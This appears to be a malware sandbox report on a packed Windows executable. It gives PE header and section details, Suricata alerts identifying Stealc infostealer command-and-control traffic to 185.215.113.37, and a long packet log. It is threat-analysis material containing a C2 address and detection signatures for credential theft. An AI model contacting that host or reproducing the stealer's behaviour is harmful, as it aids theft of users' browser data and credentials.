Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8CE48B270Ah

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	04ebfc3ced6450972e511acc973d870f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29b000	0x200	fe608ac5d4387c33bcf4439a8ac7e1d6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
buyyxrmv	0x4f9000	0x19b000	0x19a600	28bc2da4761fd11f5bf5571337f20241	False	0.9949027185501066	data	7.953408646972678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hmyklufj	0x694000	0x1000	0x400	70568370446b0030c41233238b02ba26	False	0.7783203125	data	5.9883620010553384	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x695000	0x3000	0x2200	a82951166a54eed2a977d1df7688a0fd	False	0.06950827205882353	DOS executable (COM)	0.7925070991600774	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T17:46:08.795553+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:09.019726+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:09.025919+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-10-13T17:46:09.244891+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:09.251899+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-10-13T17:46:10.221984+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:10.890194+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:16.292425+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:17.376394+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:18.005514+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:18.618885+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:20.556493+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:21.299286+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 17:46:07.828432083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:07.833683968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:07.833786011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:07.837249994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:07.842152119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:08.550221920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:08.550443888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:08.553280115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:08.558243036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:08.795490980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:08.795552969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:08.796888113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:08.801747084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.019530058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.019551039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.019726038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.021107912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.025918961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.244731903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.244890928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.244919062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.244931936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.244942904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.244954109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.244960070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.244965076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.244966030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.244996071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.245018005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.247112036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.251899004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.470304012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.470385075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.488909960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.488955975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:09.493803978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.493817091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.493832111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.493840933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.493850946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:09.493947029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.221892118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.221983910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:10.488619089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:10.674973011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890001059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890027046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890047073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890058041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890070915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890193939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:10.890193939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:10.890373945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890392065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890403032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890413046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890425920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.890472889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:10.890472889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:10.890472889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:10.891460896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.891479015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:10.891530037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:10.891530037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.014441967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014467955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014481068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014492989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014585972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014588118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.014621973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014632940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014637947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.014637947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.014676094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014688969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.014719009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.014719009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.014750004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.015475988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.015487909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.015500069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.015533924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.015561104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.015899897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.015912056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.015923977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.015934944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.015959978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.015980005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.016532898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.016545057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.016556978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.016573906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.016585112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.016603947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.016632080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.016654968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.017400026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.017426968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.017438889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.017448902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.017494917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.017494917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.138916969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.138935089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.138952017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.138967991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.138984919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.138995886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139004946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139010906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139015913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139022112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139043093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.139084101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.139100075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.139823914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139836073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139847994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139858007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139868021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.139890909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.139966011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.140247107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140299082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140310049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140337944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.140352964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.140352964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.140357971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140368938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140398979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.140429974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.140835047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140846968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140856981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140882969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.140888929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140906096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140918016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140927076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140937090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.140945911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.140976906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.141001940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.141766071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.141777992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.141793966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.141834021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.141834021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.141854048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.141864061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.141875029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.141885042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.141896009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.141899109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.141942978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.141983986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.142713070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.142724037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.142735004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.142765999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.142776966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.142787933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.142796993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.142798901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.142811060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.142822027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.142841101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.142841101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.142869949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.143627882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.143645048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.143656969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.143709898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.143709898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286432028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286448956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286461115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286480904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286492109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286503077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286518097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286554098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286557913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286557913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286564112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286591053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286602020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286613941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286623955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286658049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286658049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286861897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286874056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286886930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286901951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286902905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286902905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286912918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286926985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.286948919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286948919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.286984921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.287005901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287018061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287029028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287039995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287050962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287060022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.287060976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287075043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287084103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.287133932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.287133932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.287818909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287830114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287841082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287877083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287887096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287893057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.287899971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287910938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287946939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287956953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287960052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.287960052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.287971020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287982941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.287992954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288003922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288017988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.288017988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.288146019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.288702011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288842916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288853884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288860083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288868904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288876057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288892031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288896084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.288907051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288918018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288928986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288938046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288949013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288959980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.288975000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.289079905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.289688110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289700031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289710999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289752007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289762974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289774895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289787054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289808035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.289808035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.289896011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289907932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289918900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289930105 CEST	80	49730	185.215.113.37	192.168.2.4
